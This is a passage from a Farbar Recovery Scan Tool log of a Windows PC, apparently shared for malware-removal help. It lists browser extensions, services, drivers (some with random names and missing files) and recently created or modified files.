CHR Extension: (Twitch Now) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlmbdmpjmlijibeockamioakdpmhjnpk [2021-06-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Font Changer) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\obgkjikcnonokgaiablbenkgjcdbknna [2023-06-06]
CHR Extension: (Proxy SwitchyOmega) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\padekgcemlokbadohgkifijomclgjgif [2020-12-20]
CHR Extension: (Cold Turkey Blocker) - C:\Users\John\AppData\Local\Google\Chrome\User Data\Default\Extensions\pganeibhckoanndahmnfggfoeofncnii [2023-11-17]
CHR HKU\S-1-5-21-949114339-2066100574-2594248327-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [daanglpcpkjjlkhcbladppjphglbigam]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2012-09-23]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]

Opera:
=======
OPR Profile: C:\Users\John\AppData\Roaming\Opera Software\Opera Stable [2023-11-23]
OPR DownloadDir: I:\stahovanie
OPR Notifications: Opera Stable -> hxxps://aternos.org; hxxps://forum24.os.tc; hxxps://mail.google.com; hxxps://meet.google.com; hxxps://opencsgo.com; hxxps://skinodds.com; hxxps://www.pvpro.com; hxxps://www.tipsport.sk
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=o ... utEncoding}
OPR Extension: (Custom Page Zoom) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\acfbkfekhjlboehfjgdidogogpbklcdm [2023-08-18]
OPR Extension: (AdNauseam) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\dklmdhmkdbinnceekhecifmjhiiabolp [2023-10-31]
OPR Extension: (Rich Hints Agent) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2023-10-17]
OPR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\gjpihpkhgfngnbhhfdehlcmgfahbciip [2022-07-26]
OPR Extension: (Opera Wallet) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\gojhcdgcpbpfigcaejpfhfegekdgiblk [2023-11-10]
OPR Extension: (Twitch Now) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\hiahmjdojdodmjjhhddegdnhcpjmokmo [2021-06-20]
OPR Extension: (Scripter) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\hpochgedhgonjnpbepkbnkkibkjigknc [2021-09-08]
OPR Extension: (Aliexpress Search by image) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\jkcacbjiofjgbnaknoojjboeiinempoa [2021-11-03]
OPR Extension: (Deezer™ Downloader (Deezloader)) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\jnmflndddcmkajmkoahaenmnfbdckaom [2022-02-28]
OPR Extension: (Amazon Assistant Promotion) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2021-08-14]
OPR Extension: (SessionBox - Multi login to any website) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\megbklhjamjbcafknkgmokldgolkdfig [2023-07-20]
StartMenuInternet: (HKLM) Opera GXStable - C:\Program Files\Opera GX\Launcher.exe

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [173040 2022-09-26] (Adobe Inc. -> Adobe Inc.)
S4 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [818128 2018-04-24] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
S4 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [2321384 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2128872 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S2 apacheds-default; C:\Program Files (x86)\ApacheDS\bin\wrapper.exe [204800 2020-02-28] () [File not signed]
S4 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [8477080 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avast; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
S4 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [621728 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avast! Tools; C:\Program Files\AVAST Software\Avast\aswToolsSvc.exe [351848 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avastm; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
S4 AvastSecureBrowserElevationService; C:\Program Files (x86)\AVAST Software\Browser\Application\86.1.6960.198\elevation_service.exe [1136920 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-05-17] (BattlEye Innovations e.K. -> )
S4 CDROM_Detect; C:\Program Files\4G LTE Modem\4G_Server.exe [327680 2016-11-19] () [File not signed]
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2776664 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1467072 2016-05-30] (Disc Soft Ltd -> Disc Soft Ltd)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1135648 2022-04-16] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029472 2021-10-06] (Epic Games Inc. -> Epic Games, Inc.)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [206304 2021-03-31] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
R2 ewserver; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Electrical\server\EwServer.exe [191664 2018-02-26] (Trace Software International -> )
S4 FACEITService; C:\Program Files\FACEIT AC\FACEITService.exe [20756320 2020-05-01] (FACE IT LIMITED -> )
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [82216 2021-02-17] (Mixbyte Inc -> Freemake)
R2 Hamachi2Svc; C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe [3361736 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
S4 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-09-19] (Hi-Rez Studios) [File not signed]
S4 impi_hydra; C:\Program Files\Common Files\SolidWorks Shared\Simulation Worker Agent\hydra_service.exe [880296 2018-02-26] (Intel(R) Software Development Products -> Intel Corporation)
S4 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe [419248 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
S4 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193656 2016-03-30] (Logitech Inc -> Logitech Inc.)
S4 memcached; c:\memcached\memcached.exe [507640 2009-12-16] () [File not signed]
S4 MSSQL$TEW_SQLEXPRESS; C:\ProgramData\SOLIDWORKS Electrical\MSSQL12.TEW_SQLEXPRESS\MSSQL\Binn\sqlservr.exe [372416 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
S4 ProtonVPN Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPNService.exe [100672 2020-04-17] (ProtonVPN AG -> )
S4 ProtonVPN Update Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.UpdateService.exe [61760 2020-04-17] (ProtonVPN AG -> )
S4 QMEmulatorService; D:\Program Files\TxGameAssistant\AppMarket\QMEmulatorService.exe [166384 2019-12-20] (Tencent Technology(Shenzhen) Company Limited -> Tencent)
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] (Razer USA Ltd. -> )
R2 RemoteSolverDispatcher; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe [264704 2018-02-26] (Mentor Graphics Corporation -> Mentor Graphics Corporation)
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2017072 2022-02-02] (Rockstar Games, Inc. -> Rockstar Games) [File not signed]
R2 SbieSvc; D:\windows programy\Sandboxie-Plus\SbieSvc.exe [363992 2022-08-29] (Tonalio GmbH -> Sandboxie-Plus.com)
R2 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2018-05-27] (SolidWorks) [File not signed]
S4 SQLAgent$TEW_SQLEXPRESS; C:\ProgramData\SOLIDWORKS Electrical\MSSQL12.TEW_SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [613056 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
R2 Synology Drive VSS Service x64; C:\Program Files (x86)\Synology\SynologyDrive\bin\vss-service-x64.exe [370824 2022-03-29] (Synology Inc. -> )
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [18035512 2023-10-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 ucldr_battlegrounds_gl; C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe [7099632 2021-07-21] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S4 uncheater_bgl; C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe [2097008 2020-11-05] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S2 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [746504 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R2 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10430256 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R2 VMwareHostd; C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe [15477208 2020-03-07] (VMware, Inc. -> )
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [56552 2016-03-22] (Microsoft Corporation -> Microsoft Corporation)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [147392 2019-04-30] (Microsoft Corporation -> Microsoft Corporation)
S4 wampapache64; c:\wamp64\bin\apache\apache2.4.33\bin\httpd.exe [30720 2018-03-18] (Apache Software Foundation) [File not signed]
S4 wampmariadb64; c:\wamp64\bin\mariadb\mariadb10.2.14\bin\mysqld.exe [14550440 2018-03-26] (MariaDB Corporation Ab -> )
S4 wampmysqld64; c:\wamp64\bin\mysql\mysql5.7.21\bin\mysqld.exe [39551488 2017-12-28] () [File not signed]
R2 WebDriveService; C:\Program Files\WebDrive\wdService.exe [12388232 2019-12-20] (South River Technologies -> South River Technologies, Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [7531208 2021-08-01] (PUBG CORPORATION -> PUBG Corporation)
S2 IpOverUsbSvc; "C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe" [X]
S2 SWVisualize2018.BoostService; "C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize Boost\SWVisualize.BoostService.exe" [X]
S2 SWVisualize2018.Queue.Server; "C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 amdkmdap; C:\Windows\System32\Drivers\amdkmdap.sys [614280 2020-11-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 asmthub3; C:\Windows\System32\DRIVERS\asmthub3.sys [140032 2013-08-16] (MCCI Corporation -> ASMedia Technology Inc)
R3 asmtxhci; C:\Windows\System32\DRIVERS\asmtxhci.sys [424192 2013-08-16] (MCCI Corporation -> ASMedia Technology Inc)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [36792 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [208672 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [332880 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [247888 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [97360 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42424 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [176384 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswNetHub; C:\Windows\System32\drivers\aswNetHub.sys [522480 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R3 aswNetNd6; C:\Windows\System32\DRIVERS\aswNetNd6.sys [38152 2020-04-15] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [108928 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [84496 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [851256 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [469472 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [216984 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [326064 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [58368 2009-06-02] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com)
S3 CMUAC; C:\Windows\System32\DRIVERS\Headset6400x1.SYS [386560 2013-10-03] (C-MEDIA ELECTRONICS INC. -> A4Tech Inc.)
S3 CT_QUALCOMM_U_drv; C:\Windows\System32\DRIVERS\CT_QUALCOMM_U_drv.sys [118016 2009-04-27] (Microsoft Windows Hardware Compatibility Publisher -> QUALCOMM Incorporated)
R3 DroidCam; C:\Windows\System32\DRIVERS\droidcam.sys [31576 2020-04-24] (DEV47 APPS -> Dev47Apps)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-06-04] (Disc Soft Ltd -> Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-06-04] (Disc Soft Ltd -> Disc Soft Ltd)
R3 EuMusDesignVirtualAudioCableWdm; C:\Windows\System32\DRIVERS\vrtaucbl.sys [66728 2016-07-05] (NTONYX Ltd. -> Eugene V. Muzychenko)
R0 FACEIT; C:\Windows\System32\Drivers\FACEIT.sys [20193656 2020-05-01] (FACE IT LIMITED -> )
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [32384 2018-05-03] (Sony Mobile Communications AB -> Sony Mobile Communications)
R1 gvm; C:\Windows\System32\DRIVERS\gvm.sys [393712 2020-09-22] (Google LLC -> Google LLC)
S3 HidNt; C:\Windows\System32\DRIVERS\HIDNt.sys [22576 2008-04-18] (Futime Manufacturing Ltd -> Microsoft Corporation) [File not signed]
S3 HidNt; C:\Windows\SysWOW64\DRIVERS\HIDNt.sys [18992 2008-04-18] (Futime Manufacturing Ltd -> Microsoft Corporation) [File not signed]
S3 IOMap; C:\Windows\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 KProcessHacker3; C:\Program Files\Process Hacker 2\kprocesshacker.sys [45208 2016-03-29] (Wen Jia Liu -> wj32)
R2 LdBoxDrv; C:\Program Files\dnplayerext2\LdBoxDrv.sys [319376 2020-06-18] (Shanghai Changzhi Network Technology Co., Ltd. -> Oracle Corporation)
R3 LGBusEnum; C:\Windows\System32\drivers\LGBusEnum.sys [37408 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S3 LGVirHid; C:\Windows\System32\drivers\LGVirHid.sys [26912 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S3 libusbK; C:\Windows\System32\DRIVERS\libusbK.sys [47200 2018-07-23] (Travis Lee Robinson -> hxxp://libusb-win32.sourceforge.net)
R3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv.sys [42016 2013-11-27] (Visicom Media Inc. -> Visicom Media Inc.)
R3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [35232 2013-12-06] (Visicom Media Inc. -> Visicom Media Inc.)
S3 navagio; C:\Program Files\Common Files\PUBG\navagio.sys [3632840 2021-08-03] (PUBG CORPORATION -> )
R1 npcap; C:\Windows\System32\DRIVERS\npcap.sys [69432 2019-09-04] (Insecure.Com LLC -> Insecure.Com LLC.)
S3 ProtonVPNSplitTunnel; C:\Program Files (x86)\Proton Technologies\ProtonVPN\x64\Win7\ProtonVPN.SplitTunnelDriver.sys [22456 2020-01-15] (ProtonVPN AG -> Proton Technologies AG)
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-06-22] (Corel Corporation -> Corel Corporation)
S4 RsFx0310; C:\Windows\System32\DRIVERS\RsFx0310.sys [249024 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
R3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [7947096 2019-05-08] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation)
R3 rzendpt; C:\Windows\System32\DRIVERS\rzendpt.sys [51224 2016-05-12] (Razer USA Ltd. -> Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer Inc. -> Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [137840 2016-09-07] (Razer Inc. -> Razer, Inc.)
R3 SbieDrv; D:\windows programy\Sandboxie-Plus\SbieDrv.sys [249368 2022-08-29] (Microsoft Windows Hardware Compatibility Publisher -> Sandboxie-Plus.com)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [40664 2015-02-03] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R3 tapprotonvpn; C:\Windows\System32\DRIVERS\tapprotonvpn.sys [39864 2020-04-06] (ProtonVPN AG -> The OpenVPN Project)
R3 VBAudioVMAUXVAIOMME; C:\Windows\System32\DRIVERS\vbaudio_vmauxvaio64_win7.sys [41192 2019-01-06] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBAudioVMVAIOMME; C:\Windows\System32\DRIVERS\vbaudio_vmvaio64_win7.sys [41192 2019-01-05] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBoxNetAdp; C:\Windows\System32\DRIVERS\VBoxNetAdp6.sys [239432 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\System32\DRIVERS\VBoxNetLwf.sys [249344 2020-10-16] (Oracle Corporation -> Oracle Corporation)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [135768 2016-06-28] (Oracle Corporation -> Oracle Corporation)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [22216888 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R1 vmkbd3; C:\Windows\System32\DRIVERS\vmkbd.sys [52288 2020-03-07] (VMware, Inc. -> VMware, Inc.)
R2 VMnetBridge; C:\Windows\System32\DRIVERS\vmnetbridge.sys [66368 2020-03-07] (VMware, Inc. -> VMware, Inc.)
R3 VOICEMOD_Driver; C:\Windows\System32\drivers\vmdrv.sys [31744 2021-12-28] (Voicemod Sociedad Limitada -> Windows (R) Win 7 DDK provider)
R0 vsock; C:\Windows\System32\DRIVERS\vsock.sys [103736 2019-08-14] (VMware, Inc. -> VMware, Inc.)
R2 vstor2-mntapi20-shared; C:\Windows\SysWow64\drivers\vstor2-x64.sys [52576 2018-02-28] (VMware, Inc. -> VMware, Inc.)
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [159936 2016-08-16] (NGO -> MBB)
R2 WebDriveFSD; C:\Program Files\WebDrive\wdfsd.sys [108960 2018-09-25] (South River Technologies -> South River Technologies, Inc.)
R3 wovad_micarray; C:\Windows\System32\drivers\womic.sys [35696 2017-11-25] (Beijing Wolicheng Technology Co., Ltd. -> Windows (R) Win 7 DDK provider)
S3 cqwzjpilmi; \??\C:\Windows\xdmkcicuts.sys [X]
S3 glavcam; system32\DRIVERS\glavcam.sys [X]
S3 Mac606; system32\DRIVERS\Mac606.sys [X]
S3 qmeyutfnfe; \??\C:\Windows\eqyvkatwim.sys [X]
S3 rxyfbwoazs; \??\C:\Windows\kytgzgrgpv.sys [X]
S3 USBAAPL64; System32\Drivers\usbaapl64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2023-11-23 19:29 - 2023-11-23 19:29 - 002383872 _____ (Farbar) C:\Users\John\Downloads\FRST64.exe
2023-11-23 19:27 - 2023-11-23 19:27 - 000000021 _____ C:\Users\John\Desktop\forum viry ucet.txt
2023-11-22 15:23 - 2023-11-22 15:23 - 012383864 _____ (Tim Kosse) C:\Users\John\Downloads\FileZilla_3.66.1_win64-setup.exe
2023-11-22 03:28 - 2023-11-22 03:28 - 000000089 _____ C:\Users\John\Desktop\txt.txt
2023-11-20 22:32 - 2023-11-22 11:41 - 000000131 _____ C:\Users\John\Desktop\praxe chill.txt
2023-11-18 21:58 - 2023-11-18 21:58 - 000731283 _____ C:\Users\John\Downloads\F3-BP-2015-Skrivan-Jaroslav-Bakalarka.pdf
2023-11-18 21:55 - 2023-11-18 21:55 - 000051947 _____ C:\Users\John\Downloads\white-paper-php-performance-checklist.pdf
2023-11-18 21:02 - 2023-11-18 21:02 - 001282692 _____ C:\Users\John\Downloads\Server-Side_Lookup_Optimization_of_A_Web_Service.pdf
2023-11-16 18:50 - 2023-11-16 18:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-Link
2023-11-16 18:49 - 2023-11-16 18:49 - 000000000 ____D C:\Program Files (x86)\TP-Link
2023-11-16 18:49 - 2019-05-08 03:23 - 007947096 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\rtwlanu.sys
2023-11-16 18:49 - 2019-05-08 03:23 - 007947096 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\Drivers\rtwlanu.sys
2023-11-16 18:49 - 2019-05-08 03:23 - 001185504 _____ (Realtek Semiconductor Corp. ) C:\Windows\system32\Rtlihvs.dll
2023-11-16 18:49 - 2019-05-08 03:23 - 000114920 _____ (Realtek Semiconductor Corp. ) C:\Windows\system32\RtlExtUI.dll
2023-11-16 18:49 - 2019-05-08 03:23 - 000049384 _____ (Windows (R) Server 2003 DDK provider) C:\Windows\system32\rtlCoInst.dll
2023-11-16 18:48 - 2023-11-16 18:49 - 000000000 ____D C:\Users\John\AppData\Local\TP-Link
2023-11-16 18:48 - 2023-11-16 18:48 - 000000000 ____D C:\ProgramData\TP-Link
2023-11-15 08:15 - 2023-11-14 14:28 - 000587065 _____ C:\Users\John\cviko2_231004.ipynb
2023-11-15 08:15 - 2023-11-14 14:28 - 000447921 _____ C:\Users\John\cviko231018.ipynb
2023-11-15 08:15 - 2023-11-14 14:27 - 000629594 _____ C:\Users\John\cviko20231108.ipynb
2023-11-15 08:15 - 2023-11-14 14:27 - 000317529 _____ C:\Users\John\Untitled1.ipynb
2023-11-13 17:48 - 2023-11-13 17:48 - 000001366 _____ C:\Users\John\Desktop\team1 laravel.ffs_gui
2023-11-11 15:50 - 2023-11-11 15:50 - 000000000 ____D C:\Users\John\.mputils
2023-11-10 09:40 - 2023-11-10 09:40 - 000262144 _____ C:\Windows\Minidump\111023-100277-01.dmp
2023-11-07 01:17 - 2023-11-07 01:17 - 000001057 _____ C:\Users\John\Desktop\WinHugs.lnk
2023-11-07 01:17 - 2023-11-07 01:17 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinHugs
2023-11-07 01:15 - 2023-11-07 01:17 - 000000000 ____D C:\Program Files (x86)\WinHugs
2023-11-03 17:27 - 2023-11-03 17:27 - 000002468 _____ C:\Users\John\Desktop\moje upraveny arduno.txt
2023-11-03 12:46 - 2023-11-03 12:21 - 000006143 _____ C:\HTTPClient.cpp
2023-11-03 12:46 - 2023-10-31 21:58 - 000001218 _____ C:\HTTPClient.h
2023-11-03 12:46 - 2023-10-26 13:56 - 000001987 _____ C:\wifly_http.ino
2023-11-03 12:46 - 2023-10-26 13:56 - 000000182 _____ C:\Debug.h
2023-11-02 03:24 - 2023-11-02 03:24 - 003243838 _____ C:\Users\John\Desktop\lol ucet.psd
2023-11-01 13:36 - 2023-11-01 13:36 - 000000339 _____ C:\Users\John\Desktop\nove regexy pre opgg.txt
2023-10-26 19:17 - 2023-10-26 19:23 - 000000000 ____D C:\Users\John\AppData\Local\playit_gg
2023-10-26 19:17 - 2023-10-26 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Playit.gg
2023-10-26 13:50 - 2023-11-09 09:37 - 000000000 ____D C:\Users\John\AppData\Local\Arduino15
2023-10-26 13:50 - 2023-10-26 13:57 - 000000000 ____D C:\Users\John\Documents\Arduino
2023-10-26 13:49 - 2023-10-26 13:49 - 000000833 _____ C:\Users\Public\Desktop\Arduino.lnk
2023-10-26 13:49 - 2023-10-26 13:49 - 000000833 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arduino.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2023-11-23 19:50 - 2018-05-27 13:28 - 000047522 _____ C:\Users\John\Downloads\FRST.txt
2023-11-23 19:50 - 2017-02-03 15:18 - 000000000 ____D C:\FRST
2023-11-23 19:41 - 2020-07-28 11:17 - 000000000 ____D C:\Users\John\AppData\Local\Discord
2023-11-23 19:32 - 2016-06-05 17:45 - 000000000 ____D C:\Users\John\AppData\Roaming\TS3Client
2023-11-23 18:10 - 2022-09-30 08:56 - 000000000 ____D C:\Users\John\AppData\Roaming\superProductivity
2023-11-23 15:35 - 2018-06-28 19:47 - 000000000 ____D C:\Users\John\AppData\Local\LogMeIn Hamachi
2023-11-23 11:58 - 2017-02-21 16:47 - 000000000 ____D C:\Users\John\AppData\Roaming\obs-studio
2023-11-23 11:40 - 2018-07-28 23:15 - 000000000 ____D C:\Users\John\AppData\Roaming\discord
2023-11-23 10:41 - 2009-07-14 05:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2023-11-23 10:41 - 2009-07-14 05:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2023-11-23 10:36 - 2020-04-15 23:16 - 000000001 _____ C:\Windows\vgkbootstatus.dat
2023-11-23 10:36 - 2009-07-14 06:13 - 001061310 _____ C:\Windows\system32\PerfStringBackup.INI
2023-11-23 10:36 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
